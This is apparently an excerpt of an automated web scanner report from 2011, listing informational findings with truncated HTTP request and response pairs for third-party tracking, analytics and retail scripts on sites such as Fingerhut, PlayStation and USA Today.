GET /mr/a.gif?a=6E8D64&v=1 HTTP/1.1 Host: 6e8d64.r.axf8.net Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 68 Content-Type: application/x-javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:32:49 GMT gomez.b2(321575940457221 |
Severity: | Information |
Confidence: | Firm |
Host: | http://a.monetate.net |
Path: | /trk/3/s/a-06b34e08/p |
GET /trk/3/s/a-06b34e08/p Host: a.monetate.net Proxy-Connection: keep-alive Referer: http://travel.travelocity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 200 OK Content-Length: 31 Expires: Mon, 09 May 2011 01:29:53 GMT Server: CherryPy/3.1.0.monetate1 Cache-Control: no-cache Date: Mon, 16 May 2011 01:29:53 GMT Content-Type: application/x-javascript Connection: close monetate.r([["c", 566828221]]); |
Severity: | Information |
Confidence: | Firm |
Host: | http://blog.us.plays |
Path: | /wp-content/themes |
GET /wp-content/themes Host: blog.us.playstation.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Age: 1002546 Date: Wed, 04 May 2011 05:21:53 GMT Expires: Sun, 05 Jun 2011 05:24:33 GMT Cache-Control: max-age=2764800 ,public Connection: Keep-Alive Via: N1.MIA1: 100 Server: nginx Content-Type: image/gif Content-Length: 185 Last-Modified: Mon, 14 Mar 2011 15:03:46 GMT Cneonction: close Accept-Ranges: bytes .PNG . ...IHDR.......G............ K.....IEND.B`. |
Severity: | Information |
Confidence: | Firm |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Activi |
GET /BurstingPipe/Activi Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C4=; u2=d61a92e1-c563-4003 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding P3P: CP="NOI DEVa OUR BUS UNI" Date: Mon, 16 May 2011 01:43:14 GMT Connection: close Content-Length: 267 ebReportingImg0 = new Image(); ebReportingImg0.src = 'http://segment-pixel ebReportingImg1 = new Image(); ebReportingImg1.sr ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://cdn.gigya.com |
Path: | /js/gigya.services |
GET /js/gigya.services Host: cdn.gigya.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com |
HTTP/1.1 200 OK Content-Length: 21429 Content-Type: application/x-javascript Last-Modified: Sun, 01 May 2011 07:04:34 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 x-server: web103 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" X-Powered-By: ASP.NET Cache-Control: max-age=900 Date: Sun, 15 May 2011 21:19:57 GMT Connection: close gigya.global._GetEle ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://contextweb |
Path: | /asp/Context/Context |
GET /asp/Context/Context Host: contextweb.usatoday.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 93 Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Cache-Control: private, max-age=2555494 Date: Mon, 16 May 2011 01:19:44 GMT Connection: close var ContextWebKeywords="key |
Severity: | Information |
Confidence: | Firm |
Host: | http://eval.bizrate.com |
Path: | /js/survey_126457_1.js |
GET /js/survey_126457_1.js HTTP/1.1 Host: eval.bizrate.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: trafficSourceDebugParam=; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI" Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: sessionid=7202325108 Set-Cookie: br=13055101949906417 Set-Cookie: _data=_time%3A%3Astart Content-Type: text/html;charset=ISO Content-Language: en-US Date: Mon, 16 May 2011 01:43:13 GMT Content-Length: 16130 <!-- // hide script var BIZRATE = { init:function() { this.mid = '126457'; this.type = 1; if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) { ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://feeds.delicious |
Path: | /v2/json/urlinfo/data |
GET /v2/json/urlinfo/data?url Host: feeds.delicious.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:13 GMT P3P: policyref="http://info Vary: Accept-Encoding Content-Type: text/javascript; charset=utf-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Server: YTS/1.19.4 Content-Length: 22 jsonp1305508793345([]) |
Severity: | Information |
Confidence: | Firm |
Host: | http://fingerhut-www |
Path: | /baynote/tags3/common |
GET /baynote/tags3/common Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fingerhut-www.baynote.net |
HTTP/1.1 200 OK Server: BNServer Cache-Control: public,max-age=27800,must Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 16 May 2011 01:28:19 GMT Content-Length: 78159 baynote_globals ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://gs.instantservice |
Path: | /geoipAPI.js |
GET /geoipAPI.js?src=ii3&ts Host: gs.instantservice.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:22 GMT Server: Apache P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Length: 477 Connection: close Content-Type: text/javascript; charset=utf-8 isgeoipapi_continent_code = "NA";isgeoipapi_country ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://https.edge.ru4.com |
Path: | /smartserve/ad |
GET /smartserve/ad?placement Host: https.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AG-00000001389358554 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://https Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Set-Cookie: ru4.1320=1#2656#0#2656=ad Content-Type: text/html Date: Mon, 16 May 2011 01:38:37 GMT Connection: close document.write("<img src=\"http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://ipinvite |
Path: | /Invitations/Javascripts |
GET /Invitations/Javascripts Host: ipinvite.iperceptions.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private,max-age=0 Date: Mon, 16 May 2011 01:38:57 GMT Content-Type: text/html; charset=utf-8 Expires: Wed, 01 Jan 1997 12:00:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Srv-by: INVSVR10 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 351 var _http = document.location ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://ots.optimize |
Path: | /ots/ots/js-3.0/90335 |
GET /ots/ots/js-3.0/90335 Host: ots.optimize.webtrends Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:11 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=15AB95930 Via: 1.1 ots.optimize.webtrends p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Vary: Accept-Encoding, User-Agent Content-Length: 9407 Connection: Keep-Alive /** * Copyright 2005-2009 webtrends All Rights Reserved. * WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. * * $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://ots.optimize |
Path: | /ots/ots/js-3.0/90335 |
GET /ots/ots/js-3.0/90335 Host: ots.optimize.webtrends Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=15AB95930 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:27:16 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=D05F7BC70 Via: 1.1 ots.optimize.webtrends p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Vary: Accept-Encoding, User-Agent Content-Length: 9407 Connection: Keep-Alive /** * Copyright 2005-2009 webtrends All Rights Reserved. * WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. * * $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://secureshopping |
Path: | /images/favicon.ico |
GET /images/favicon.ico HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:50 GMT ETag: "CdLEBc9iPi7" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: text/html; charset=utf-8 Content-Length: 1017 Date: Mon, 16 May 2011 01:32:50 GMT GIF89a............]^ 5.5V.Db..?. 4.;..4..E.....?..B..3.....& 2..)...........A. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://shop.pacsun.com |
Path: | /js/widget-qv-uc.jsp |
GET /js/widget-qv-uc.jsp HTTP/1.1 Host: shop.pacsun.com Proxy-Connection: keep-alive Referer: http://shop.pacsun.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=4A5CD2AB1 |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 6093 Cache-Control: max-age=1 Date: Mon, 16 May 2011 01:43:40 GMT Connection: close /* QuickView Javascript */ /* ------------------------- //quickViewcommands[0] = "show" action //quickViewcommands[1] = "add product" action var quickViewCommands = new Array(2); ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 89538 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:29:50 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://sony.tt.omtrdc.net |
Path: | /m2/sony/mbox/ajax |
GET /m2/sony/mbox/ajax Host: sony.tt.omtrdc.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com |
HTTP/1.1 200 OK Content-Type: text/JavaScript Content-Length: 226 Date: Sun, 15 May 2011 21:19:58 GMT Server: Test & Target mboxFactories.get( ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 163 Date: Sun, 15 May 2011 20:26:48 GMT Server: Test & Target mboxFactories.get( |
Severity: | Information |
Confidence: | Firm |
Host: | http://sr2.liveperson.net |
Path: | /hcp/html/mTag.js |
GET /hcp/html/mTag.js?site Host: sr2.liveperson.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: LivePersonID=LP i=16601155425835,d |
HTTP/1.1 200 OK Content-Type: application/x-javascript Content-Location: http://sales.liveperson Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT Accept-Ranges: bytes ETag: "e0f243e4cde1cb1:1dbf" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 17291 Date: Sun, 15 May 2011 21:20:03 GMT Connection: close eval((function(s){var a,c,e,i,j,o="",r,t="..... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://ts.istrack.com |
Path: | /trackingAPI.js |
GET /trackingAPI.js?ai= Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: ts.istrack.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:29:02 GMT Server: Apache P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Length: 73 Connection: close Content-Type: text/javascript; charset=utf-8 ISVT_setCookie('isvt |
Severity: | Information |
Confidence: | Firm |
Host: | http://us.playstation.com |
Path: | /uwps/CookieHandler |
POST /uwps/CookieHandler HTTP/1.1 Host: us.playstation.com Proxy-Connection: keep-alive Referer: http://us.playstation.com Content-Length: 0 Origin: http://us.playstation.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:26:41 GMT Server: Apache ntCoent-Length: 4 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 4 null |
Severity: | Information |
Confidence: | Firm |
Host: | http://webassets.scea.com |
Path: | /pscomauth/groups/public |
GET /pscomauth/groups/public Host: webassets.scea.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:26:59 GMT Expires: Sun, 15 May 2011 01:30:11 GMT Last-Modified: Mon, 25 Oct 2010 21:48:45 GMT Cache-Control: max-age=3600 Content-Type: text/plain; charset=UTF-8 ETag: "abb35ab-1536-49377f Accept-Ranges: bytes Server: Level-3 Origin Storage/1.5 Content-Length: 5430 ............ .h...&... .... .........(....... ..... .....@................... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://wow.weather.com |
Path: | /weather/wow/module |
GET /weather/wow/module Host: wow.weather.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:51 GMT Server: Apache SVRNAME: web2x07 Vary: Accept-Encoding Content-Length: 5455 Content-Type: text/html if (document.getElementById && !document.getElementById( { var head = document.getElements var link = document.createElement( ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.siteadvisor User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.47.42 X-Cnection: close Date: Mon, 16 May 2011 01:40:24 GMT Content-Length: 58 Given URL is not allowed by the Application configuration. |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /assets/f/misc/bkgicon |
GET /assets/f/misc/bkgicon Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Last-Modified: Sun, 15 May 2011 23:00:01 GMT Accept-Ranges: bytes Content-Length: 741 Content-Type: image/jpeg Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:30:47 GMT Date: Mon, 16 May 2011 01:30:47 GMT Connection: close GIF89a..+................ ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /fingerhut/assets/images |
GET /fingerhut/assets/images Host: www.fingerhut.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 11 May 2011 13:33:48 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=UTF-8 Vary: Accept-Encoding Content-Length: 1406 Date: Mon, 16 May 2011 01:33:55 GMT Connection: close ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /fingerhut/css/sifr |
GET /fingerhut/css/sifr Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2618 Date: Mon, 16 May 2011 01:26:50 GMT Connection: close Set-Cookie: JSESSIONID=348A3EFB9 var bellgothicbold = { src: '/fingerhut/fonts var bellgothic = { src: '/fingerhut/fonts //sIFR.useStyleCheck = true; sIFR.fromLocal = true; // Nex ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/financial-snapshot |
GET /js/financial-snapshot Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Language: en Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:26:58 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 5659 Date: Mon, 16 May 2011 01:26:58 GMT Connection: close Set-Cookie: JSESSIONID=D72D76D19 var financialSnapshot = function() { $(function() { financialSnapshot.init(); }); var _p = { rColIndex : null, loadAsset : function() { if ( $( "#financialSnapshot" ).le ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/persistent_cart.jsp |
GET /js/persistent_cart.jsp HTTP/1.1 Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:26:57 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 11446 Date: Mon, 16 May 2011 01:26:57 GMT Connection: close Set-Cookie: JSESSIONID=6DE357D9B var persistentCartCommands = new Array(8); persistentCartCommands[0] = '/checkout/universal_cart persistentCartCommands[1] = '/checkout/add_item_pc persistentCartCommands[2] = '/che ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/sifr.jsp |
GET /js/sifr.jsp HTTP/1.1 Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:26:50 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 29365 Date: Mon, 16 May 2011 01:26:50 GMT Connection: close Set-Cookie: JSESSIONID=A636DF0C0 /************************ scalable Inman Flash Replacement (sIFR) version 3, revision 436. Copyright 2006 ... 2008 Mark Wubben, <http://nov ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /fingerhut/assets/images |
GET /fingerhut/assets/images Host: www.fingerhut.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 11 May 2011 13:33:48 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=UTF-8 Vary: Accept-Encoding Content-Length: 1406 Date: Mon, 16 May 2011 01:37:31 GMT Connection: keep-alive ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /fingerhut/css/sifr |
